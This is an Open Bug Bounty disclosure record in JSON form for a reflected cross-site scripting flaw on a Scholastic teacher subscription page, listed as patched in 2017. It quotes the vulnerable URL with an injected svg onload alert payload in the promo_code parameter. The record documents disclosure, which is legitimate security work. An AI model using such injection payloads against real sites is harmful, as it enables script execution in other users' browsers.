{"type": "openbugbounty", "viewCount": 1, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-10-17T01:54:56", "rev": 2}, "dependencies": {"references": [], "modified": "2017-10-17T01:54:56", "rev": 2}, "vulnersScore": 0.0}, "reporter": "SonnySpooks", "title": "teacher.scholastic.com XSS vulnerability ", "cvelist": [], "bulletinFamily": "bugbounty", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2017-06-24T06:09:00", "description": "##### Vulnerable URL:\n \n \n http://teacher.scholastic.com/products/classmags/subscribe_sale.asp?promo_code=6153%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 23.06.2017 \nLatest check for patch:| 23.06.2017 15:47 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| Unknown / Not calculated \nVIP website status:| No \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 6 January, 2017 06:29 GMT \nGeneric security notifications sent to website owner| 6 January, 2017 06:31 GMT \nNotification sent to subscribers (without technical details)| 6 January, 2017 10:17 GMT \nVulnerability details disclosed by researcher| 13 January, 2017 07:14 GMT \nVulnerability patched by the website owner| 24 June, 2017 06:09 GMT\n", "href": "https://www.openbugbounty.org/reports/203506/", "id": "OBB:203506", "lastseen": "2017-10-17T01:54:56", "openbugbounty": {"patchStatus": "patched", "mirror": ""}, "published": "2017-01-06T06:29:00"}

{}